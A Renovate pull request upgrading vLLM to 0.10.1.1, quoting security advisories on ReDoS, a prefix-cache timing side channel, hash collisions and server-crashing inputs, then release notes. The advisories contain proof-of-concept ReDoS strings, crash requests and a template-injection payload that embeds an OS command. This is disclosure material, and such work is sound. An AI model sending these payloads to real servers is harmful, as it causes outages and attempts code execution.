Update dependency vllm to v0.10.1.1 [SECURITY] #8

renovate · 2025-05-28T18:27:38Z

This PR contains the following updates:

Package	Change	Age	Confidence
vllm	`==0.8.5` -> `==0.10.1.1`

GitHub Vulnerability Alerts

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False

Impact

Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

https://github.com/vllm-project/vllm/pull/18454
Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

The regex r"$(.*?)$\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

Limit the input string length.
Use a non-recursive matching approach, or write a regex with stricter content constraints.
Consider using possessive quantifiers or atomic groups (not supported in Python yet), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

Limit the length of model_output.
Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
Prefer re.finditer() and enforce a length constraint on each match.

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

Use a more specific pattern (e.g., via JSON parsing).
Impose limits on current_text length.
Avoid using .* to capture large blocks of text; prefer structured parsing when possible.

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

Limit the length of actual.
Prefer stepwise search for { and } or use a robust JSON extraction tool.
Recommend first locating the range with simple string search, then applying regex.

Fix

https://github.com/vllm-project/vllm/pull/18454

CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment

GPU: NVIDIA A100 (40G)
CUDA: 11.8
PyTorch: 2.3.1
OS: Ubuntu 18.04
vLLM: v0.5.1
Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Fixes

https://github.com/vllm-project/vllm/pull/17045

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

Affected file: vllm/multimodal/hasher.py
Affected method: MultiModalHasher.serialize_item
https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
- Incorrect cache hits, leading to abnormal responses
- Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.

Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.

For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.

Fixes

https://github.com/vllm-project/vllm/pull/17378

CVE-2025-48942

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of runtime errors on the crash depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 718
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [
{
"role": "user",
"content": "Crash via Pattern"
}
],
"tools": [
{
"type": "function",
"function": {
"name": "crash02",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "string",
"pattern": "{{ import('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash02"
}
},
"stream": false,
"max_tokens": 32,
"temperature": 0.2,
"top_p": 1,
"n": 1
}

Impact

Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests.

Fix

https://github.com/vllm-project/vllm/pull/17623

CVE-2025-48956

Summary

A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.

Details

The vulnerability leverages the abuse of HTTP headers. By setting a header such as X-Forwarded-For to a very large value like ("A" * 5_800_000_000), the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system resources.

Impact

What kind of vulnerability is it? Who is impacted?
Type of vulnerability: Denial of Service (DoS)

Resolution

Upgrade to a version of vLLM that includes appropriate HTTP limits by deafult, or use a proxy in front of vLLM which provides protection against this issue.

Release Notes

vllm-project/vllm (vllm)

`v0.10.1.1`

Compare Source

This is a critical bugfix and security release:

Fix CUTLASS MLA Full CUDAGraph (#23200)
Limit HTTP header count and size (#23267): GHSA-rxc4-3w6r-4v47
Do not use eval() to convert unknown types (#23266): GHSA-79j6-g2m3-jgfw

Full Changelog: vllm-project/vllm@v0.10.1...v0.10.1.1

`v0.10.1`

Compare Source

Highlights

v0.10.1 release includes 727 commits, 245 committers (105 new contributors).

Model Support

New model families: GPT-OSS with comprehensive tool calling and streaming support (#22327, #22330, #22332, #22335, #22339, #22340, #22342), Command-A-Vision (#22660), mBART (#22883), and SmolLM3 using Transformers backend (#22665).
Vision-language models: Official Eagle multimodal support with Llama4 backend (#20788), Step3 vision-language models (#21998), Gemma3n multimodal (#20495), MiniCPM-V 4.0 (#22166), HyperCLOVAX-SEED-Vision-Instruct-3B (#20931), Emu3 with Transformers backend (#21319), Intern-S1 (#21628), and Prithvi in online serving mode (#21518).
Enhanced existing models: NemotronH support (#22349), Ernie 4.5 Base 0.3B model name change (#21735), GLM-4.5 series improvements (#22215), Granite models with fused MoE configurations (#21332) and quantized checkpoint loading (#22925), Ultravox support for Llama 4 and Gemma 3 backends (#17818), Mamba1 and Jamba model support in V1 (without CUDA graphs) (#21249)
Advanced model capabilities: Qwen3 EPLB (#20815) and dual-chunk attention support (#21924), Qwen native Eagle3 target support (#22333).
Architecture expansions: Encoder-only models without KV-cache enabling BERT-style architectures (#21270), expanded tensor parallelism support in Transformers backend (#22651), tensor parallelism for Deepseek_vl2 vision transformer (#21494), and tensor/pipeline parallelism with Mamba2 kernel for PLaMo2 (#19674).
V1 engine compatibility: Extended support for additional pooling models (#21747) and Step3VisionEncoder distributed processing option (#22697).

Engine Core

CUDA graph performance: Full CUDA graph support with separate attention routines, adding FA2 and FlashInfer compatibility (#20059), plus 6% end-to-end throughput improvement from Cutlass MLA (#22763).
Attention system advances: Multiple attention metadata builders per KV cache specification (#21588), tree attention backend for v1 engine (experimental) (#20401), FlexAttention encoder-only support (#22273), upgraded FlashAttention 3 with attention sink support (#22313), and multiple attention groups for KV sharing patterns (#22672).
Speculative decoding optimizations: N-gram speculative decoding with single KMP token proposal algorithm (#22437), explicit EAGLE3 interface for enhanced compatibility (#22642).
Default behavior improvements: Pooling models now default to chunked prefill and prefix caching (#20930), disabled chunked local attention by default for Llama4 for better performance (#21761).
Extensibility and configuration: Model loader plugin system (#21067), custom operations support for FusedMoe (#22509), rate limiting with bucket algorithm for proxy server (#22643), torch.compile support for bailing MoE (#21664).
Performance optimizations: Improved startup time by disabling C++ compilation of symbolic shapes (#20836), enhanced headless models for pooling in Transformers backend (#21767).

Hardware & Performance

NVIDIA Blackwell (SM100) optimizations: CutlassMLA as default backend (#21626), FlashInfer MoE per-tensor scale FP8 backend (#21458), SM90 CUTLASS FP8 GEMM with kernel tuning and swap AB support (#20396).
NVIDIA RTX 5090/RTX PRO 6000 (SM120) support: Block FP8 quantization (#22131) and CUTLASS NVFP4 4-bit weights/activations support (#21309).
AMD ROCm platform enhancements: Flash Attention backend for Qwen-VL models (#22069), AITER HIP block quantization kernels (#21242), reduced device-to-host transfers (#22683), and optimized kernel performance for small batch sizes 1-4 (#21350).
Attention and compute optimizations: FlashAttention 3 attention sinks performance boost (#22478), Triton-based multi-dimensional RoPE replacing PyTorch implementation (#22375), async tensor parallelism for scaled matrix multiplication (#20155), optimized FlashInfer metadata building (#21137).
Memory and throughput improvements: Mamba2 reduced device-to-device copy overhead (#21075), fused Triton kernels for RMSNorm (#20839, #22184), improved multimodal hasher performance for repeated image prompts (#22825), multithreaded async multimodal loading (#22710).
Parallelization and MoE optimizations: Guided decoding throughput improvements (#21862), balanced expert sharding for MoE models (#21497), expanded fused kernel support for topk softmax (#22211), fused MoE for nomic-embed-text-v2-moe (#18321).
Hardware compatibility and kernels: ARM CPU build fixes for systems without BF16 support (#21848), Machete memory-bound performance improvements (#21556), FlashInfer TRT-LLM prefill attention kernel support (#22095), optimized reshape_and_cache_flash CUDA kernel (#22036), CPU transfer support in NixlConnector (#18293).
Specialized CUDA kernels: GPT-OSS activation functions (#22538), RLHF weight loading acceleration (#21164).

Quantization

Advanced quantization techniques: MXFP4 and bias support for Marlin kernel (#22428), NVFP4 GEMM FlashInfer backends (#22346), compressed-tensors mixed-precision model loading (#22468), FlashInfer MoE support for NVFP4 (#21639).
Hardware-optimized quantization: Dynamic 4-bit quantization with Kleidiai kernels for CPU inference (#17112), TensorRT-LLM FP4 quantization optimized for MoE low-latency inference (#21331).
Expanded model quantization support: BitsAndBytes quantization for InternS1 (#21953) and additional MoE models (#21370, #21548), Gemma3n quantization compatibility (#21974), calibration-free RTN quantization for MoE models (#20766), ModelOpt Qwen3 NVFP4 support (#20101).
Performance and compatibility improvements: CUDA kernel optimization for Int8 per-token group quantization (#21476), non-contiguous tensor support in FP8 quantization (#21961), automatic detection of ModelOpt quantization formats (#22073).
Breaking change: Removed AQLM quantization support (#22943) - users should migrate to alternative quantization methods.

API & Frontend

OpenAI API compatibility: Unix domain socket support for local communication (#18097), improved error response format matching upstream specification (#22099), aligned tool_choice="required" behavior with OpenAI when tools list is empty (#21052).
New API capabilities: Dedicated LLM.reward interface for reward models (#21720), chunked processing for long inputs in embedding models (#22280), AsyncLLM proper response handling for aborted requests (#22283).
Configuration and environment: Multiple API keys support for enhanced authentication (#18548), custom vLLM tuned configuration paths (#22791), environment variable control for logging statistics (#22905), multimodal cache size (#22441), and DeepGEMM E8M0 scaling behavior (#21968).
CLI and tooling improvements: V1 API support for run-batch command (#21541), custom process naming for better monitoring (#21445), improved help display showing available choices (#21760), optional memory profiling skip for multimodal models (#22950), enhanced logging of non-default arguments (#21680).
Tool and parser support: HermesToolParser for models without special tokens (#16890), multi-turn conversation benchmarking tool (#20267).
Distributed serving enhancements: Enhanced hybrid distributed serving with multiple API servers in load balancing mode (#21510), request_id support for external load balancers (#21009).
User experience enhancements: Improved error messaging for multimodal items (#22114), per-request pooling control via PoolingParams (#20538).

Dependencies

FlashInfer updates: Updated to v0.2.8 for improved performance (#21385), moved to optional dependency install with pip install vllm[flashinfer] for flexible installation (#21959).
Mamba SSM restructuring: Updated to version 2.2.5 (#21421), removed from core requirements to reduce installation complexity (#22541).
Docker and deployment: Docker-aware precompiled wheel support for easier containerized deployment (#21127, #22106).
Python package updates: OpenAI Python dependency updated to latest version for API compatibility (#22316).
Dependency optimizations: Removed xformers requirement for Mistral-format Pixtral and Mistral3 models (#21154), deprecation warnings added for old DeepGEMM version (#22194).

V0 Deprecation

Important: As part of the ongoing V0 engine cleanup, several breaking changes have been introduced:

CLI flag updates: Replaced --task with --runner and --convert options (#21470), deprecated --disable-log-requests in favor of --enable-log-requests for clearer semantics (#21739), renamed --expand-tools-even-if-tool-choice-none to --exclude-tools-when-tool-choice-none for consistency (#20544).
API cleanup: Removed previously deprecated arguments and methods as part of ongoing V0 engine codebase cleanup (#21907).

What's Changed

Deduplicate Transformers backend code using inheritance by @hmellor in https://github.com/vllm-project/vllm/pull/21461
[Bugfix][ROCm] Fix for warp_size uses on host by @gshtras in https://github.com/vllm-project/vllm/pull/21205
[TPU][Bugfix] fix moe layer by @yaochengji in https://github.com/vllm-project/vllm/pull/21340
[v1][Core] Clean up usages of SpecializedManager by @zhouwfang in https://github.com/vllm-project/vllm/pull/21407
[Misc] Fix duplicate FusedMoEConfig debug messages by @njhill in https://github.com/vllm-project/vllm/pull/21455
[Core] Support model loader plugins by @22quinn in https://github.com/vllm-project/vllm/pull/21067
remove GLM-4 quantization wrong Code by @zRzRzRzRzRzRzR in https://github.com/vllm-project/vllm/pull/21435
Replace --expand-tools-even-if-tool-choice-none with --exclude-tools-when-tool-choice-none for v0.10.0 by @okdshin in https://github.com/vllm-project/vllm/pull/20544
[Misc] Improve comment for DPEngineCoreActor._set_cuda_visible_devices() by @ruisearch42 in https://github.com/vllm-project/vllm/pull/21501
[Feat] Allow custom naming of vLLM processes by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/21445
bump flashinfer to v0.2.8 by @cjackal in https://github.com/vllm-project/vllm/pull/21385
[Attention] Optimize FlashInfer MetadataBuilder Build call by @LucasWilkinson in https://github.com/vllm-project/vllm/pull/21137
[Model] Officially support Emu3 with Transformers backend by @hmellor in https://github.com/vllm-project/vllm/pull/21319
[Bugfix] Fix CUDA arch flags for MoE permute by @minosfuture in https://github.com/vllm-project/vllm/pull/21426
[Fix] Update mamba_ssm to 2.2.5 by @elvischenv in https://github.com/vllm-project/vllm/pull/21421
[Docs] Update Tensorizer usage documentation by @sangstar in https://github.com/vllm-project/vllm/pull/21190
[Docs] Rewrite Distributed Inference and Serving guide by @crypdick in https://github.com/vllm-project/vllm/pull/20593
[Bug] Fix Compressed Tensor NVFP4 cutlass_fp4_group_mm illegal memory access by @yewentao256 in https://github.com/vllm-project/vllm/pull/21465
Update flashinfer CUTLASS MoE Kernel by @wenscarl in https://github.com/vllm-project/vllm/pull/21408
[XPU] Conditionally import CUDA-specific passes to avoid import errors on xpu platform by @chaojun-zhang in https://github.com/vllm-project/vllm/pull/21036
[P/D] Move FakeNixlWrapper to test dir by @ruisearch42 in https://github.com/vllm-project/vllm/pull/21328
[P/D] Support CPU Transfer in NixlConnector by @juncgu in https://github.com/vllm-project/vllm/pull/18293
[Docs][minor] Fix broken gh-file link in distributed serving docs by @crypdick in https://github.com/vllm-project/vllm/pull/21543
[Docs] Add Expert Parallelism Initial Documentation by @simon-mo in https://github.com/vllm-project/vllm/pull/21373
update flashinfer to v0.2.9rc1 by @weireweire in https://github.com/vllm-project/vllm/pull/21485
[TPU][TEST] HF_HUB_DISABLE_XET=1 the test 3. by @QiliangCui in https://github.com/vllm-project/vllm/pull/21539
[MoE] More balanced expert sharding by @WoosukKwon in https://github.com/vllm-project/vllm/pull/21497
[Frontend] run-batch supports V1 by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21541
[Docs] Fix site_url for RunLLM by @hmellor in https://github.com/vllm-project/vllm/pull/21564
[Bug] Fix DeepGemm Init Error by @yewentao256 in https://github.com/vllm-project/vllm/pull/21554
Fix GLM-4 PP Missing Layer When using with PP. by @zRzRzRzRzRzRzR in https://github.com/vllm-project/vllm/pull/21531
[Kernel] adding fused_moe configs for upcoming granite4 by @bringlein in https://github.com/vllm-project/vllm/pull/21332
[Bugfix] DeepGemm utils : Fix hardcoded type-cast by @varun-sundar-rabindranath in https://github.com/vllm-project/vllm/pull/21517
[DP] Support api-server-count > 0 in hybrid DP LB mode by @njhill in https://github.com/vllm-project/vllm/pull/21510
[TPU][Test] Temporarily suspend this MoE model in test_basic.py. by @QiliangCui in https://github.com/vllm-project/vllm/pull/21560
[Docs] Add requirements/common.txt to run unit tests by @zhouwfang in https://github.com/vllm-project/vllm/pull/21572
Integrate TensorSchema with shape validation for Phi3VImagePixelInputs by @bbeckca in https://github.com/vllm-project/vllm/pull/21232
[CI] Update CODEOWNERS for CPU and Intel GPU by @bigPYJ1151 in https://github.com/vllm-project/vllm/pull/21582
[Bugfix] fix modelscope snapshot_download serialization by @andyxning in https://github.com/vllm-project/vllm/pull/21536
[Model] Support tensor parallel for timm ViT in Deepseek_vl2 by @wzqd in https://github.com/vllm-project/vllm/pull/21494
[Model] Fix a check for None but the return value was empty list in Gemma3 MM vision_embeddings by @hfan in https://github.com/vllm-project/vllm/pull/21479
[Misc][Tools] make max-model-len a parameter in auto_tune script by @yaochengji in https://github.com/vllm-project/vllm/pull/21321
[CI/Build] fix cpu_extension for apple silicon by @ignaciosica in https://github.com/vllm-project/vllm/pull/21195
[Misc] Removed undefined cmake variables MOE_PERMUTE_ARCHS by @chenyang78 in https://github.com/vllm-project/vllm/pull/21262
[TPU][Bugfix] fix OOM issue in CI test by @yaochengji in https://github.com/vllm-project/vllm/pull/21550
[Tests] Harden DP tests by @njhill in https://github.com/vllm-project/vllm/pull/21508
Add H20-3e fused MoE kernel tuning configs for Qwen3-Coder-480B-A35B-Instruct by @Xu-Wenqing in https://github.com/vllm-project/vllm/pull/21598
[Bugfix] GGUF: fix AttributeError: 'PosixPath' object has no attribute 'startswith' by @kebe7jun in https://github.com/vllm-project/vllm/pull/21579
[Quantization] Enable BNB support for more MoE models by @jeejeelee in https://github.com/vllm-project/vllm/pull/21370
[V1] Get supported tasks from model runner instead of model config by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/21585
[Bugfix][Logprobs] Fix logprobs op to support more backend by @MengqingCao in https://github.com/vllm-project/vllm/pull/21591
[Model] Fix Ernie4.5MoE e_score_correction_bias parameter by @xyxinyang in https://github.com/vllm-project/vllm/pull/21586
